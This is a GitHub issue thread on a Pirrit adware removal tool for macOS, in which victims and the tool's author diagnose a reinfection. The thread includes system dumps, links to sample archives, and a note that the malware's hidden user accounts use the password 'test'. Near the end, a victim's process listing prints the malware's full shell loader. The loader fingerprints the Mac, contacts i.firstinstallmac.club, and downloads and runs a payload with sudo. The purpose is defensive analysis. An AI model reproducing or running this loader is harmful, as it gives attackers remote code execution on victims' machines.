search

aserper / osx.pirrit_removal

Removal tool for osx.pirrit
27 stars 10 forks source link

The maleware seems to have mutated #3

Open noamf opened 8 years ago

noamf commented 8 years ago

Running the scripts does not help any more. It seems to remove one instance of the malware, but there seems to be a mechanism now that continuously creates new instance. I've seen a few at a time on my infected machine and could not find how to stop it from creating new ones.

jonespen commented 8 years ago

Same problem here. When I run $ dscl . -list /Users UniqueID | grep 401 it returns 14 (!) users, but when I run the script, $netPrefFileName and $appName seem to be empty. Probably because /Library/Preferences/com.common.plist does not exist. However, com.fixedly.plist does exist (fixedly is the current (random) name of the adware). Any ideas?

Btw, really great work @aserper, this thing is a real pain in the ass.

aserper commented 8 years ago

Hi all, Sorry for the late reply, been travelling. @jonespen that's crazy! Can you share the output of dscl? Do you happen to have the dropper?

jonespen commented 8 years ago

Sure!

$ dscl . -list /Users UniqueID | grep 401
delightedly             401
dexterity               401
diatropism              401
fucosan                 401
loadsome                401
manzanita               401
nonahydrate             401
parasiticidal           401
pituite                 401
ringable                401
seclusionist            401
stereographical         401
trisyllabical           401
upspeak                 401

Love the name parasiticidal btw haha

By the dropper, do you mean the folder containing rec_script.sh?

aserper commented 8 years ago

The folder is good but it isn't the dropper. The dropper is usually an installer of some sort, pkg file. Read my report / see my talk (its on YouTube) about pirrit, you'll understand On Jun 6, 2016 11:25 PM, "Jon Espen Kvisler" notifications@github.com wrote:

Sure!

$ dscl . -list /Users UniqueID | grep 401 delightedly 401 dexterity 401 diatropism 401 fucosan 401 loadsome 401 manzanita 401 nonahydrate 401 parasiticidal 401 pituite 401 ringable 401 seclusionist 401 stereographical 401 trisyllabical 401 upspeak 401

By the dropper, do you mean the folder containing rec_script.sh?

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224076928, or mute the thread https://github.com/notifications/unsubscribe/AKdJfFY6bPOi_CD2EdE8t3KsfnhCm3llks5qJIIegaJpZM4IuXM4 .

jonespen commented 8 years ago

Ah ok. Yea I saw your talk yesterday, fascinating in a weird way.

The problem is I have no idea how the mac got infected (it's my girlfriends). However, looking trough ~/Downloads I find MacKeeper.pkg (dated 20. aug 2015). MacKeeper.pkg.zip (disclaimer: you probably shouldn't run this)

aserper commented 8 years ago

Probably linked to it. Check its xattrs to see if it was dropped by another program. I'll look into the archive tomorrow since i am heavily jetlagged (BOSTON-LONDON-TEL AVIV, takes its toll) On Jun 6, 2016 11:40 PM, "Jon Espen Kvisler" notifications@github.com wrote:

Ah ok. Yea I saw your talk yesterday, fascinating in a weird way.

The problem is I have no idea how the mac got infected (it's my girlfriends). However, looking trough ~/Downloads I find MacKeeper.pkg. MacKeeper.pkg.zip https://github.com/aserper/osx.pirrit_removal/files/301305/MacKeeper.pkg.zip

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224081171, or mute the thread https://github.com/notifications/unsubscribe/AKdJfNoDORYm4WOxFhbkaDNi5esaI5Bdks5qJIWqgaJpZM4IuXM4 .

jonespen commented 8 years ago

No worries!

Not quite sure how to check the xattrs, but ran this:

$ xattr MacKeeper.pkg
com.apple.metadata:kMDItemDownloadedDate
com.apple.metadata:kMDItemWhereFroms
com.apple.quarantine
aserper commented 8 years ago

Do the same but with xattr -l and post here On Jun 6, 2016 11:53 PM, "Jon Espen Kvisler" notifications@github.com wrote:

No worries!

Not quite sure how to check the xattrs, but ran this:


com.apple.metadata:kMDItemDownloadedDate
com.apple.metadata:kMDItemWhereFroms
com.apple.quarantine

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224084731,
or mute the thread
https://github.com/notifications/unsubscribe/AKdJfJeKiCVveQ6fM6Bw5auEyqmfURfpks5qJIivgaJpZM4IuXM4
.
jonespen commented 8 years ago 
$ xattr -l  MacKeeper.pkg
com.apple.metadata:kMDItemDownloadedDate:
00000000  62 70 6C 69 73 74 30 30 A1 01 33 41 BB 85 F1 BE  |bplist00..3A....|
00000010  7D 91 BC 08 0A 00 00 00 00 00 00 01 01 00 00 00  |}...............|
00000020  00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 13                                   |.....|
00000035
com.apple.metadata:kMDItemWhereFroms:
00000000  62 70 6C 69 73 74 30 30 A2 01 02 5F 10 5C 68 74  |bplist00..._..ht|
00000010  74 70 3A 2F 2F 64 6F 77 6E 6C 6F 61 64 2E 6D 61  |tp://download.ma|
00000020  63 6B 65 65 70 65 72 2E 63 6F 6D 2F 70 61 63 6B  |ckeeper.com/pack|
00000030  61 67 65 2E 70 68 70 3F 6B 65 79 3D 6D 7A 62 5F  |age.php?key=mzb_|
00000040  32 34 31 2E 31 31 34 37 39 32 37 30 2E 31 34 34  |241.11479270.144|
00000050  30 30 37 30 32 30 31 2E 36 2E 6D 7A 62 26 74 72  |0070201.6.mzb&tr|
00000060  74 3D 32 39 5F 32 31 34 30 30 5F 11 01 28 68 74  |t=29_21400_..(ht|
00000070  74 70 3A 2F 2F 6D 61 63 6B 65 65 70 65 72 61 70  |tp://mackeeperap|
00000080  70 32 2E 6D 61 63 6B 65 65 70 65 72 2E 63 6F 6D  |p2.mackeeper.com|
00000090  2F 6C 61 6E 64 69 6E 67 73 2F 31 32 33 2E 31 2F  |/landings/123.1/|
000000A0  69 6E 64 65 78 2E 70 68 70 3F 61 66 66 69 64 3D  |index.php?affid=|
000000B0  6D 7A 62 5F 32 34 31 2E 31 31 34 37 39 32 37 30  |mzb_241.11479270|
000000C0  2E 31 34 34 30 30 37 30 32 30 31 2E 36 2E 6D 7A  |.1440070201.6.mz|
000000D0  62 26 75 74 6D 5F 73 6F 75 72 63 65 3D 6D 74 6D  |b&utm_source=mtm|
000000E0  26 75 74 6D 5F 6D 65 64 69 75 6D 3D 26 75 74 6D  |&utm_medium=&utm|
000000F0  5F 63 61 6D 70 61 69 67 6E 3D 6D 6B 5F 6D 74 6D  |_campaign=mk_mtm|
00000100  5F 63 70 69 5F 74 33 5F 6E 69 6E 63 5F 6A 63 26  |_cpi_t3_ninc_jc&|
00000110  75 74 6D 5F 74 65 72 6D 3D 26 75 74 6D 5F 63 6F  |utm_term=&utm_co|
00000120  6E 74 65 6E 74 3D 72 6F 6E 5F 63 6C 65 61 6E 70  |ntent=ron_cleanp|
00000130  72 6F 74 31 37 26 75 73 65 72 44 65 66 69 6E 65  |rot17&userDefine|
00000140  72 3D 6D 7A 62 5F 32 33 31 34 26 74 72 74 3D 32  |r=mzb_2314&trt=2|
00000150  39 5F 32 31 34 30 30 26 61 6C 65 72 74 3D 31 33  |9_21400&alert=13|
00000160  26 74 69 64 5F 65 78 74 3D 32 30 53 49 35 35 32  |&tid_ext=20SI552|
00000170  38 72 47 46 7A 77 45 65 34 31 44 36 72 58 53 31  |8rGFzwEe41D6rXS1|
00000180  7A 73 6F 32 49 30 30 30 2E 3B 33 30 39 34 37 3B  |zso2I000.;30947;|
00000190  31 35 31 33 36 33 00 08 00 0B 00 6A 00 00 00 00  |151363.....j....|
000001A0  00 00 02 01 00 00 00 00 00 00 00 03 00 00 00 00  |................|
000001B0  00 00 00 00 00 00 00 00 00 00 01 96              |............|
000001bc
com.apple.quarantine: 0002;55d5ba3e;Safari;25A4735B-34F7-4AAC-9E4A-BEB55B369D22
aserper commented 8 years ago

Looks like that this was downloaded straight from Mackeeper's website though. Do you have any weird files in /tmp and /var/tmp? On Jun 6, 2016 11:55 PM, "Jon Espen Kvisler" notifications@github.com wrote:

$ xattr -l MacKeeper.pkg com.apple.metadata:kMDItemDownloadedDate: 00000000 62 70 6C 69 73 74 30 30 A1 01 33 41 BB 85 F1 BE |bplist00..3A....| 00000010 7D 91 BC 08 0A 00 00 00 00 00 00 01 01 00 00 00 |}...............| 00000020 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 13 |.....| 00000035 com.apple.metadata:kMDItemWhereFroms: 00000000 62 70 6C 69 73 74 30 30 A2 01 02 5F 10 5C 68 74 |bplist00.....ht| 00000010 74 70 3A 2F 2F 64 6F 77 6E 6C 6F 61 64 2E 6D 61 |tp://download.ma| 00000020 63 6B 65 65 70 65 72 2E 63 6F 6D 2F 70 61 63 6B |ckeeper.com/pack| http://ckeeper.com/pack%7C 00000030 61 67 65 2E 70 68 70 3F 6B 65 79 3D 6D 7A 62 5F |age.php?key=mzb| 00000040 32 34 31 2E 31 31 34 37 39 32 37 30 2E 31 34 34 |241.11479270.144| 00000050 30 30 37 30 32 30 31 2E 36 2E 6D 7A 62 26 74 72 |0070201.6.mzb&tr| 00000060 74 3D 32 39 5F 32 31 34 30 30 5F 11 01 28 68 74 |t=2921400..(ht| 00000070 74 70 3A 2F 2F 6D 61 63 6B 65 65 70 65 72 61 70 |tp://mackeeperap| 00000080 70 32 2E 6D 61 63 6B 65 65 70 65 72 2E 63 6F 6D |p2.mackeeper.com| 00000090 2F 6C 61 6E 64 69 6E 67 73 2F 31 32 33 2E 31 2F |/landings/123.1/| 000000A0 69 6E 64 65 78 2E 70 68 70 3F 61 66 66 69 64 3D |index.php?affid=| 000000B0 6D 7A 62 5F 32 34 31 2E 31 31 34 37 39 32 37 30 |mzb_241.11479270| 000000C0 2E 31 34 34 30 30 37 30 32 30 31 2E 36 2E 6D 7A |.1440070201.6.mz| 000000D0 62 26 75 74 6D 5F 73 6F 75 72 63 65 3D 6D 74 6D |b&utm_source=mtm| 000000E0 26 75 74 6D 5F 6D 65 64 69 75 6D 3D 26 75 74 6D |&utm_medium=&utm| 000000F0 5F 63 61 6D 70 61 69 67 6E 3D 6D 6B 5F 6D 74 6D |_campaign=mk_mtm| 00000100 5F 63 70 69 5F 74 33 5F 6E 69 6E 63 5F 6A 63 26 |_cpi_t3_ninc_jc&| 00000110 75 74 6D 5F 74 65 72 6D 3D 26 75 74 6D 5F 63 6F |utm_term=&utm_co| 00000120 6E 74 65 6E 74 3D 72 6F 6E 5F 63 6C 65 61 6E 70 |ntent=ron_cleanp| 00000130 72 6F 74 31 37 26 75 73 65 72 44 65 66 69 6E 65 |rot17&userDefine| 00000140 72 3D 6D 7A 62 5F 32 33 31 34 26 74 72 74 3D 32 |r=mzb_2314&trt=2| 00000150 39 5F 32 31 34 30 30 26 61 6C 65 72 74 3D 31 33 |9_21400&alert=13| 00000160 26 74 69 64 5F 65 78 74 3D 32 30 53 49 35 35 32 |&tid_ext=20SI552| 00000170 38 72 47 46 7A 77 45 65 34 31 44 36 72 58 53 31 |8rGFzwEe41D6rXS1| 00000180 7A 73 6F 32 49 30 30 30 2E 3B 33 30 39 34 37 3B |zso2I000.;30947;| 00000190 31 35 31 33 36 33 00 08 00 0B 00 6A 00 00 00 00 |151363.....j....| 000001A0 00 00 02 01 00 00 00 00 00 00 00 03 00 00 00 00 |................| 000001B0 00 00 00 00 00 00 00 00 00 00 01 96 |............| 000001bc com.apple.quarantine: 0002;55d5ba3e;Safari;25A4735B-34F7-4AAC-9E4A-BEB55B369D22

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224085316, or mute the thread https://github.com/notifications/unsubscribe/AKdJfL1VztwZ1WzLeFYMePyWZyg-tmr5ks5qJIklgaJpZM4IuXM4 .

jonespen commented 8 years ago

/var/tmp contains a lot of weird shit.

image

dit8.tgz is pirrit related right? Also, BrowserEnhancer24052016_HelperBar.tgz doesn't look good. I mean, everything there looks shady :p

aserper commented 8 years ago

Indeed! Could you zip that directory and upload it? On Jun 7, 2016 12:02 AM, "Jon Espen Kvisler" notifications@github.com wrote:

/var/tmp contains a lot of weird shit.

[image: image] https://cloud.githubusercontent.com/assets/230841/15837711/a59f3a8c-2c3a-11e6-969f-3c5dcad456e0.png

dit8.tgz is pirrit related right? Also, BrowserEnhancer24052016_HelperBar.tgz doesn't look good.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224087445, or mute the thread https://github.com/notifications/unsubscribe/AKdJfCAMgPkFpfSJYHN0XvY6IKoLXLQnks5qJIrfgaJpZM4IuXM4 .

aserper commented 8 years ago

@jonespen I just read everything again (I was really jetlagged yesterday). The mackeeper in your downloads directory is too old to be linked to this. Maybe try looking at the xattrs (-l) of the files you found in your temp directory. I am REALLY curious on how it was dropped on your machine. I got a sample which is just a little bit older then what you have - yours is really new! Please zip and send what ever is in this screen shot if that's ok - I'm really curious.

jonespen commented 8 years ago

Yea, I'll try to send it later today when I get my hands on the mac

jonespen commented 8 years ago

Here is /var/tmp:

aserper commented 8 years ago

Thanks! Will look at it tomorrow first thing. Btw, did you try to see what in all of those users' home directories? You could always "su ", password will be "test". Then just "cd ~" and see what's there On Jun 7, 2016 10:21 PM, "Jon Espen Kvisler" notifications@github.com wrote:

Here is /var/tmp: https://www.dropbox.com/s/60oy6wmq88shsi0/Arkiv.zip?dl=0

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224386379, or mute the thread https://github.com/notifications/unsubscribe/AKdJfFBoCAPXKflCqBkbbd35WN6rfP35ks5qJcTPgaJpZM4IuXM4 .

jonespen commented 8 years ago 
bash-3.2$ su delightedly
Password:
bash-3.2$ cd ~
bash-3.2$ ls
Library
bash-3.2$ cd Library/
bash-3.2$ ls
Preferences
bash-3.2$ cd Preferences/
bash-3.2$ ls
com.trolltech.plist
bash-3.2$ cat com.trolltech.plist 
bplist00?
ofQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dylib-x86_64o?Qt Factory Cache 4?8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dyliboeQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib-x86_64o?Qt Factory Cache 4?8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib? U40806Q0_#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?

                                                                          _2016-04-04T11:35:19Xcorewlan?U40806_#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?_2016-04-04T11:35:19Wgeneri???????
                                          "%;DIOu????bash-3.2$ 
bash-3.2$

Seems like most of the users contain the same folder/content

aserper commented 8 years ago

I am starting to suspect that pirrit might installed itself several times on your machines. Will look into the files soon and report back. BTW, if you're on twitter, it's a much more convenient way to talk - @0xAmit. If not, we can still continue here :)

On Tue, Jun 7, 2016 at 10:54 PM, Jon Espen Kvisler <notifications@github.com

wrote:

bash-3.2$ su delightedly Password: bash-3.2$ cd ~ bash-3.2$ ls Library bash-3.2$ cd Library/ bash-3.2$ ls Preferences bash-3.2$ cd Preferences/ bash-3.2$ ls com.trolltech.plist bash-3.2$ cat com.trolltech.plist bplist00? ofQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dylib-x86_64o?Qt Factory Cache 4?8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dyliboeQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib-x8664o?Qt Factory Cache 4?8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib? U40806Q0#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?

                                                                      _2016-04-04T11:35:19Xcorewlan?U40806_#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?_2016-04-04T11:35:19Wgeneri???????
                                      "%;DIOu????bash-3.2$

bash-3.2$

Seems like most of the users contain the same folder/content

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224394739, or mute the thread https://github.com/notifications/unsubscribe/AKdJfEqB8JkApx5NtU2CZe-xOXo1kNrlks5qJcx5gaJpZM4IuXM4 .

noamf commented 8 years ago

I'm at @noamf1. I would have contributed more info to the discussion, but I ended up re-imaging the mac before you were back form your travels, so I don't have the files anymore. From what I remember trying to remove it, as I was removing instances (applications with random names) new ones were getting created.

On Wed, Jun 8, 2016 at 12:15 PM aserper notifications@github.com wrote:

I am starting to suspect that pirrit might installed itself several times on your machines. Will look into the files soon and report back. BTW, if you're on twitter, it's a much more convenient way to talk - @0xAmit. If not, we can still continue here :)

On Tue, Jun 7, 2016 at 10:54 PM, Jon Espen Kvisler < notifications@github.com

wrote:

bash-3.2$ su delightedly Password: bash-3.2$ cd ~ bash-3.2$ ls Library bash-3.2$ cd Library/ bash-3.2$ ls Preferences bash-3.2$ cd Preferences/ bash-3.2$ ls com.trolltech.plist bash-3.2$ cat com.trolltech.plist bplist00? ofQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dylib-x86_64o?Qt Factory Cache 4? 8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dyliboeQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib-x8664o?Qt Factory Cache 4? 8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib? U40806Q0#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?

2016-04-04T11:35:19Xcorewlan?U40806#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?_2016-04-04T11:35:19Wgeneri??????? "%;DIOu????bash-3.2$ bash-3.2$

Seems like most of the users contain the same folder/content

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub < https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224394739 , or mute the thread < https://github.com/notifications/unsubscribe/AKdJfEqB8JkApx5NtU2CZe-xOXo1kNrlks5qJcx5gaJpZM4IuXM4

.

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/aserper/osx.pirrit_removal/issues/3#issuecomment-224533969, or mute the thread https://github.com/notifications/unsubscribe/AGKh8XF21l9ul6kj777MMwA03XtTeq89ks5qJogkgaJpZM4IuXM4 .

jonespen commented 8 years ago

Sent you a follow request on twitter @aserper . I'm also pretty close to just wiping the mac, but I really want to beat this thing ;)

aserper commented 8 years ago

@jonespen Finally started working on your sample! There's some disturbing shit there! A new binary called "protector" that reinstalls the autoruns once removed! https://twitter.com/0xAmit/status/742321855604875264

markhughes commented 7 years ago

So, this is what I've found it's created on my computer...

Sophos detects this as Pirrit

screen shot 2017-10-26 at 1 31 47 pm

"Cube" is the application it installed along with it (a media codec apparently)

Edit: heres a copy of the installer: https://www.dropbox.com/s/x4irkfh5l0ujrf9/CodecFix%20%282%29.dmg.zip?dl=0

markhughes commented 7 years ago

I can't seem to compress the main binary, but here is the other stuff..

dvs_roa.zip

markhughes commented 7 years ago

Looks like its talking to http://i.firstinstallmac.club/c/cc?id=%22.. so I've added

127.0.0.1 i.firstinstallmac.club

to my hosts file.

23597 ??         0:00.07 /bin/sh -c #!/bin/sh\012rep=0;\012ad="http://i.firstinstallmac.club/c/cc?id=";\012\012ghrtyuoi ()\012{\012\011md=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }');\012\011ww=$ad$md;\012\012    erd=$(curl --silent --location --write-out "\n%{http_code}\n" $ww) 2>/dev/null;\012    st=$(echo "$erd" | sed -n '$p');\012    cnt=$(echo "$erd" | sed '$d');\012\012    if (($st == 200)); then\012\011\011\012\011\011sz=${#cnt};\012\011\011\012        if [ $sz == 2 ]; then\012\011\011\011prest;\012        else\012\011\011\011gtfal=$cnt;\012\011\011\011gtpdt;\012        fi\012    else\012        rep=$((rep+1))\012\012        if ((rep > 3)); then\012            rep=0;\012            prest;\012        else\012            riped;\012        fi\012    fi\012}\012\012prest ()\012{\012    if [ -e "/Library/pfutil" ]\012    then\012        dateVal=$(cat "/Library/pfutil");\012        dateCur=$(date +%s);\012        dateDiff=$(($dateCur - $dateVal));\012        if (($dateDiff < 86400))\012        then\012            sleep 3600;\012            prest;\012        else\012            sleep 1\012        fi\012    else\012        date +%s > "/Library/pfutil";\012        sleep 86400;\012    fi\012    rm "/Library/pfutil";\012    ghrtyuoi;\012}\012\012riped ()\012{\012    sleep 300;\012    ghrtyuoi;\012}\012\012gtpdt ()\012{\012    se=$(curl --silent --location --write-out "\n%{http_code}\n" $gtfal --output "$TMPDIR/file") 2>/dev/null;\012    sc=$(echo "$se" | sed -n '$p');\012\012    if (($sc == 200)); then\012\011\011chmod +x "$TMPDIR/file"\012        sudo sh "$TMPDIR/file";\012        prest;\012    else\012        prest;\012    fi\012}\012\012clear\012ghrtyuoi;\012

68009 ??         0:00.03 /bin/sh -c #!/bin/sh\012rep=0;\012ad="http://i.firstinstallmac.club/c/cc?id=";\012\012ghrtyuoi ()\012{\012\011md=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }');\012\011ww=$ad$md;\012\012    erd=$(curl --silent --location --write-out "\n%{http_code}\n" $ww) 2>/dev/null;\012    st=$(echo "$erd" | sed -n '$p');\012    cnt=$(echo "$erd" | sed '$d');\012\012    if (($st == 200)); then\012\011\011\012\011\011sz=${#cnt};\012\011\011\012        if [ $sz == 2 ]; then\012\011\011\011prest;\012        else\012\011\011\011gtfal=$cnt;\012\011\011\011gtpdt;\012        fi\012    else\012        rep=$((rep+1))\012\012        if ((rep > 3)); then\012            rep=0;\012            prest;\012        else\012            riped;\012        fi\012    fi\012}\012\012prest ()\012{\012    if [ -e "/Library/pfutil" ]\012    then\012        dateVal=$(cat "/Library/pfutil");\012        dateCur=$(date +%s);\012        dateDiff=$(($dateCur - $dateVal));\012        if (($dateDiff < 86400))\012        then\012            sleep 3600;\012            prest;\012        else\012            sleep 1\012        fi\012    else\012        date +%s > "/Library/pfutil";\012        sleep 86400;\012    fi\012    rm "/Library/pfutil";\012    ghrtyuoi;\012}\012\012riped ()\012{\012    sleep 300;\012    ghrtyuoi;\012}\012\012gtpdt ()\012{\012    se=$(curl --silent --location --write-out "\n%{http_code}\n" $gtfal --output "$TMPDIR/file") 2>/dev/null;\012    sc=$(echo "$se" | sed -n '$p');\012\012    if (($sc == 200)); then\012\011\011chmod +x "$TMPDIR/file"\012        sudo sh "$TMPDIR/file";\012        prest;\012    else\012        prest;\012    fi\012}\012\012clear\012ghrtyuoi;\012
dripisforever commented 6 years ago

@markhughes I got same folder too! How did you fix this ?

markhughes commented 6 years ago

Alright it was a pain in the ass from memory.

Drop that line into your /etc/hosts file first:

127.0.0.1.   i.firstinstallmac.club
markhughes commented 6 years ago

@strivemag

Drop a copy of ps -ax please

markhughes commented 6 years ago

I don't think I could properly delete the file properly but if you delete everything you can in that folder and remove the startup stuff it should work.. I'm sorry I really don't remember what I did to get rid of it.